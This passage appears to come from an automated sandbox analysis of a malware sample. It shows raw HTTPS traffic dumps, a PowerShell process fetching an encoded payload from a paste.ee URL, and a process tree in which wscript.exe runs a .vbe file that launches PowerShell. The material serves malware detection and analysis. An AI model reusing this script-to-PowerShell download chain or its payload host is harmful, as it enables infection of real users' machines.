                                                    2024-10-10 08:00:01 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                    Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                    Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                    Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                    Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                    Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                    2024-10-10 08:00:01 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                    Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                    Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.649724188.114.96.34431492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-10 08:00:06 UTC67OUTGET /d/mFPBh/0 HTTP/1.1
                                                    Host: paste.ee
                                                    Connection: Keep-Alive
                                                    2024-10-10 08:00:07 UTC1234INHTTP/1.1 200 OK
                                                    Date: Thu, 10 Oct 2024 08:00:07 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=2592000
                                                    strict-transport-security: max-age=63072000
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1; mode=block
                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbEGGOTBTPvjHbQYx9FBQ4IITkqCDWjw83QxQ5iBaYGHvYLTGRgCKcE%2FmwkGXFnmaSjx6CSeKPlxMmA1iOY1SPrbjAIB0rv3tIY%2FxcG813Xpubie%2BMqRvrK8OA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d05132b193c4361-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-10 08:00:07 UTC135INData Raw: 31 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: 1f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 78 57 79 42 74 77 50 59 57 75 63 61 79 2b 6b 6c 53 78 67 30 57 2f 4c 4b 44 42 76 4e 70 4d 49 57 37 66 69 63 6b 6b 39 31 47 36 64 33 76 42 4e 5a 79 38 46 72 69 6c 58 2f 53 6f 6e 79 6c 49 4b 7a 44 71 35 74 46 62 78 31 2f 32 31 5a 6e 51 74 52 50 4f 35 47 65 72 4a 51 66 4f 44 2b 48 46 45 50 48 57 57 76 6b 66 78 4d 57 37 32 76 66 76 58 6e 2b 66 53 32 57 6e 6e 4a 6b 6a 66 74 51 34 6a 32 6a 74 35 73 66 30 44 61 79 68 75 31 43 33 57 4f 74 2f 36 6b 2b 5a 4a 31 6d 4d 47 66 55 6a 45 65 61 6a 4c 68 46 64 43 52 54 6b 6a 6d 6e 5a 64 4c 78 33 59 51 36 54 6b 6b 74 5a 49 5a 4c 52 66 59 74 75 72 42 6f 6d 2b 54 34 53 4a 5a 43 46 58 35 5a 6d 74 4d 6d 58 6b 4f 74 38 49 44 62 69 4d 5a 68 45 51 5a 6c 32 46 56 4c 53 46 56 77 6f 4d 33 76 39 44 4d 58 54 64 56 63 4e 2b 47 42 46 55
                                                    Data Ascii: xWyBtwPYWucay+klSxg0W/LKDBvNpMIW7fickk91G6d3vBNZy8FrilX/SonylIKzDq5tFbx1/21ZnQtRPO5GerJQfOD+HFEPHWWvkfxMW72vfvXn+fS2WnnJkjftQ4j2jt5sf0Dayhu1C3WOt/6k+ZJ1mMGfUjEeajLhFdCRTkjmnZdLx3YQ6TkktZIZLRfYturBom+T4SJZCFX5ZmtMmXkOt8IDbiMZhEQZl2FVLSFVwoM3v9DMXTdVcN+GBFU
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 65 37 4c 72 38 70 74 44 6e 75 68 45 52 63 66 6e 58 41 51 63 56 57 6d 79 48 51 4a 69 37 43 79 37 6f 4f 76 71 69 33 38 34 71 37 61 4a 4a 66 53 4e 49 54 51 42 59 54 51 6b 31 79 56 68 7a 32 30 38 6a 78 72 6d 33 64 43 7a 34 72 75 39 5a 67 39 31 4d 30 56 2b 69 71 59 36 63 4e 2b 73 2b 7a 4d 75 36 69 48 63 47 69 59 45 33 76 6a 69 75 6b 6a 6d 56 4c 2b 35 47 37 48 2b 31 77 44 55 48 61 71 73 33 4a 72 56 68 70 47 37 4b 37 30 79 43 53 4e 31 72 67 75 61 54 33 52 53 55 42 6a 34 67 36 49 79 67 37 50 57 65 75 4c 30 65 54 77 55 51 4c 35 43 2b 7a 79 76 70 57 6c 55 51 35 48 45 6d 48 55 44 2f 45 47 74 30 55 39 46 71 4c 46 6c 46 4a 35 6d 6a 67 63 56 32 58 78 64 6f 30 70 37 78 32 7a 57 36 52 65 62 79 54 4b 4e 6b 30 78 71 37 64 6c 48 54 79 74 4f 6d 39 68 73 4d 6d 69 57 66 53 36
                                                    Data Ascii: e7Lr8ptDnuhERcfnXAQcVWmyHQJi7Cy7oOvqi384q7aJJfSNITQBYTQk1yVhz208jxrm3dCz4ru9Zg91M0V+iqY6cN+s+zMu6iHcGiYE3vjiukjmVL+5G7H+1wDUHaqs3JrVhpG7K70yCSN1rguaT3RSUBj4g6Iyg7PWeuL0eTwUQL5C+zyvpWlUQ5HEmHUD/EGt0U9FqLFlFJ5mjgcV2Xxdo0p7x2zW6RebyTKNk0xq7dlHTytOm9hsMmiWfS6
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 36 4f 39 33 43 67 35 54 54 56 64 6f 6d 6a 53 2f 6d 34 73 4c 71 70 71 52 7a 51 49 63 45 77 2f 35 62 4b 73 57 51 42 79 75 6c 32 44 74 57 36 73 38 7a 46 47 55 44 73 6b 72 56 6a 38 41 67 5a 7a 36 44 62 31 79 42 2f 62 6f 50 45 67 57 69 61 4e 6b 57 73 4f 42 59 74 61 41 47 42 68 77 4b 73 53 39 35 6b 47 42 51 52 37 53 62 78 4c 6f 54 63 2b 76 56 6f 47 57 5a 68 53 66 75 5a 45 54 38 6c 47 73 62 67 78 78 49 31 39 2f 39 31 4d 55 66 72 61 6b 6c 6a 7a 38 71 36 76 33 69 43 53 31 38 42 2b 4a 44 78 59 33 7a 6b 47 31 4b 61 52 2f 5a 30 48 4b 53 2f 32 6d 44 74 38 6f 67 78 32 35 7a 55 63 43 32 70 50 62 67 52 67 68 78 48 75 57 56 39 70 55 73 46 4b 49 73 50 75 38 67 30 49 50 2b 73 39 76 62 4c 65 78 72 33 59 51 67 4d 58 54 79 49 52 74 58 75 4f 78 70 2f 71 48 30 48 43 56 76 5a 74
                                                    Data Ascii: 6O93Cg5TTVdomjS/m4sLqpqRzQIcEw/5bKsWQByul2DtW6s8zFGUDskrVj8AgZz6Db1yB/boPEgWiaNkWsOBYtaAGBhwKsS95kGBQR7SbxLoTc+vVoGWZhSfuZET8lGsbgxxI19/91MUfrakljz8q6v3iCS18B+JDxY3zkG1KaR/Z0HKS/2mDt8ogx25zUcC2pPbgRghxHuWV9pUsFKIsPu8g0IP+s9vbLexr3YQgMXTyIRtXuOxp/qH0HCVvZt
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 31 49 57 59 30 36 35 46 54 41 58 53 6d 39 4a 33 43 48 73 43 35 72 50 4a 53 71 5a 56 6f 37 7a 6f 65 49 76 31 63 77 39 4d 61 4a 41 57 32 72 32 55 44 33 6c 64 70 42 41 35 5a 76 71 62 54 57 4b 31 69 66 70 30 4f 44 79 6b 4c 48 53 37 32 6d 53 2b 4d 36 55 2f 59 67 48 6f 58 72 61 66 65 35 69 63 43 4c 48 44 55 5a 58 2b 55 68 4c 44 6d 54 49 32 72 56 59 5a 78 6b 43 4d 53 6c 42 68 51 72 54 30 4c 54 64 56 56 36 78 68 42 31 45 35 59 77 4a 2f 77 32 62 63 76 70 4a 54 6c 59 37 6c 78 52 73 45 69 64 72 6e 5a 32 6d 52 77 4a 4b 58 69 51 78 65 45 57 4f 68 4b 79 74 62 47 31 6f 71 69 45 78 6c 4c 6e 2f 58 43 45 67 47 59 73 6d 76 51 4e 2f 79 4c 66 79 50 4e 43 71 59 74 6d 54 54 2b 34 6b 66 72 61 4b 68 36 56 4f 47 69 32 64 4d 2f 7a 77 41 62 42 38 50 55 2f 48 38 6f 4f 71 38 69 44 4d
                                                    Data Ascii: 1IWY065FTAXSm9J3CHsC5rPJSqZVo7zoeIv1cw9MaJAW2r2UD3ldpBA5ZvqbTWK1ifp0ODykLHS72mS+M6U/YgHoXrafe5icCLHDUZX+UhLDmTI2rVYZxkCMSlBhQrT0LTdVV6xhB1E5YwJ/w2bcvpJTlY7lxRsEidrnZ2mRwJKXiQxeEWOhKytbG1oqiExlLn/XCEgGYsmvQN/yLfyPNCqYtmTT+4kfraKh6VOGi2dM/zwAbB8PU/H8oOq8iDM
                                                    2024-10-10 08:00:07 UTC1091INData Raw: 65 67 6d 79 4b 45 6a 36 46 53 4b 70 44 67 55 61 78 42 50 35 76 32 79 62 64 4b 57 78 2f 4b 59 68 4a 76 79 48 69 50 56 68 52 2b 6f 62 42 6b 75 49 6f 35 42 38 49 70 34 2f 4e 4e 63 6b 6b 43 4a 4c 44 69 2b 44 53 33 4b 31 6f 36 75 46 35 2b 41 78 2b 46 6b 37 38 79 4c 51 6e 39 6d 45 47 58 57 52 52 31 32 52 5a 5a 2b 49 72 42 41 72 53 39 31 4e 65 7a 55 55 71 41 2f 79 53 63 50 71 41 64 70 67 38 57 6a 68 61 7a 39 37 67 44 31 78 4b 46 37 46 6c 46 69 4d 6e 73 71 43 57 55 74 65 4f 6e 46 62 32 6e 4a 78 6a 65 66 42 5a 47 35 2b 6a 43 6e 6f 72 42 53 78 4f 50 4a 37 62 6f 75 6f 52 76 43 73 6e 57 73 56 45 37 56 43 63 4d 6c 6c 76 36 4d 68 5a 32 74 70 54 6e 30 38 77 4c 64 56 6d 43 50 43 4a 30 56 43 39 77 51 33 54 34 34 35 6b 31 46 41 4e 63 76 4a 58 45 64 77 30 73 75 4d 63 59 4f
                                                    Data Ascii: egmyKEj6FSKpDgUaxBP5v2ybdKWx/KYhJvyHiPVhR+obBkuIo5B8Ip4/NNckkCJLDi+DS3K1o6uF5+Ax+Fk78yLQn9mEGXWRR12RZZ+IrBArS91NezUUqA/yScPqAdpg8Wjhaz97gD1xKF7FlFiMnsqCWUteOnFb2nJxjefBZG5+jCnorBSxOPJ7bouoRvCsnWsVE7VCcMllv6MhZ2tpTn08wLdVmCPCJ0VC9wQ3T445k1FANcvJXEdw0suMcYO
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 34 30 30 30 0d 0a 64 47 57 30 6a 2f 4f 62 62 6e 54 48 34 62 4a 42 4a 2f 52 31 5a 4e 72 59 58 43 37 33 4f 45 50 51 75 59 30 32 31 45 73 74 70 70 36 54 57 45 6c 77 69 2b 42 74 42 44 44 51 2b 49 70 41 54 39 52 39 47 74 5a 76 48 6e 4a 69 2b 51 41 62 49 44 62 69 45 49 52 4c 77 7a 35 39 55 33 43 56 39 34 63 72 2f 5a 35 5a 43 34 73 5a 44 59 69 76 38 35 6c 62 79 34 2b 46 33 34 4e 33 39 56 72 36 57 6a 34 75 35 79 6c 2b 61 57 35 44 6c 6e 49 4a 6f 36 5a 46 6a 53 4a 6a 46 63 54 4d 51 33 44 47 50 66 55 32 6a 62 51 2b 72 70 4d 44 5a 32 32 42 6f 52 30 2f 4e 75 78 52 31 4d 4e 79 69 6e 42 49 73 34 75 69 6d 4f 47 67 42 55 46 76 51 30 41 6c 73 4d 4f 74 4a 71 63 4c 64 47 4f 34 6d 43 58 6a 4a 47 72 52 44 7a 6f 2f 72 62 6f 68 50 79 51 54 57 51 75 4a 4b 35 63 6b 44 6b 32 51 53
                                                    Data Ascii: 4000dGW0j/ObbnTH4bJBJ/R1ZNrYXC73OEPQuY021Estpp6TWElwi+BtBDDQ+IpAT9R9GtZvHnJi+QAbIDbiEIRLwz59U3CV94cr/Z5ZC4sZDYiv85lby4+F34N39Vr6Wj4u5yl+aW5DlnIJo6ZFjSJjFcTMQ3DGPfU2jbQ+rpMDZ22BoR0/NuxR1MNyinBIs4uimOGgBUFvQ0AlsMOtJqcLdGO4mCXjJGrRDzo/rbohPyQTWQuJK5ckDk2QS
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 39 51 6c 63 4f 77 6c 4c 69 75 41 46 59 76 64 68 2f 57 75 76 78 34 72 36 6b 47 43 69 78 71 6c 37 4d 51 79 4b 4d 4b 56 6d 52 59 6f 4e 4c 51 77 4c 71 4d 42 44 46 65 7a 4e 45 32 67 48 57 63 2f 2f 38 4f 6b 67 2f 44 6d 62 68 74 4b 41 57 37 52 6d 48 47 47 6e 30 34 30 6d 35 31 78 56 46 32 4a 6a 46 55 6c 64 6f 74 6f 74 6b 66 51 4e 67 4e 65 68 59 72 55 75 37 76 78 63 54 4e 31 79 39 52 78 36 46 4b 5a 34 58 55 4b 77 44 4d 76 42 52 77 78 5a 62 6c 68 6a 41 71 4c 48 63 5a 43 52 34 62 39 34 7a 67 46 6c 2f 41 41 78 38 78 70 45 78 4f 34 32 4a 72 6e 51 73 37 77 6f 44 50 6f 76 49 63 2f 70 44 65 4c 73 42 63 33 56 30 38 35 37 31 6b 56 2f 38 4b 70 73 34 4b 55 63 44 2b 49 69 48 45 4b 45 35 58 65 38 73 65 71 39 6f 52 58 69 48 5a 6b 57 57 6a 38 66 4d 48 68 68 4f 55 2f 68 37 73 6e
                                                    Data Ascii: 9QlcOwlLiuAFYvdh/Wuvx4r6kGCixql7MQyKMKVmRYoNLQwLqMBDFezNE2gHWc//8Okg/DmbhtKAW7RmHGGn040m51xVF2JjFUldototkfQNgNehYrUu7vxcTN1y9Rx6FKZ4XUKwDMvBRwxZblhjAqLHcZCR4b94zgFl/AAx8xpExO42JrnQs7woDPovIc/pDeLsBc3V08571kV/8Kps4KUcD+IiHEKE5Xe8seq9oRXiHZkWWj8fMHhhOU/h7sn
                                                    2024-10-10 08:00:07 UTC1369INData Raw: 71 59 52 57 39 5a 58 36 4b 53 49 55 58 78 39 43 4b 78 42 55 64 38 59 57 57 58 36 59 6e 64 4e 66 50 63 6a 61 49 53 35 69 4b 45 72 63 38 69 42 70 5a 32 43 31 39 64 62 71 6c 4d 34 39 61 46 79 5a 69 6b 50 6a 6f 6e 34 6a 67 33 74 78 4a 34 42 61 6d 36 45 66 54 51 69 73 51 78 68 2f 4a 59 63 61 51 4c 66 38 4f 41 53 6b 6f 59 79 6e 74 56 77 59 6a 7a 53 58 68 50 63 58 42 6d 75 55 57 63 56 39 6c 43 69 4b 51 71 42 75 78 2f 33 73 58 39 43 35 66 6a 70 64 2f 57 67 45 61 4a 72 4a 77 62 6a 48 64 4b 4e 45 4c 56 6d 46 32 42 57 54 64 6f 4f 71 79 4f 4d 6a 6b 66 44 79 68 49 64 58 33 43 73 48 52 7a 74 44 6e 6f 61 35 53 75 43 64 68 5a 36 38 78 5a 49 34 75 78 6b 49 53 2f 4e 61 7a 35 32 68 65 6a 78 38 36 68 4a 43 57 69 31 6a 48 47 49 4c 39 43 2b 38 43 39 43 61 4c 62 66 46 74 64 55
                                                    Data Ascii: qYRW9ZX6KSIUXx9CKxBUd8YWWX6YndNfPcjaIS5iKErc8iBpZ2C19dbqlM49aFyZikPjon4jg3txJ4Bam6EfTQisQxh/JYcaQLf8OASkoYyntVwYjzSXhPcXBmuUWcV9lCiKQqBux/3sX9C5fjpd/WgEaJrJwbjHdKNELVmF2BWTdoOqyOMjkfDyhIdX3CsHRztDnoa5SuCdhZ68xZI4uxkIS/Naz52hejx86hJCWi1jHGIL9C+8C9CaLbfFtdU


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:03:59:56
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"
                                                    Imagebase:0x7ff63a670000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:03:59:56
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
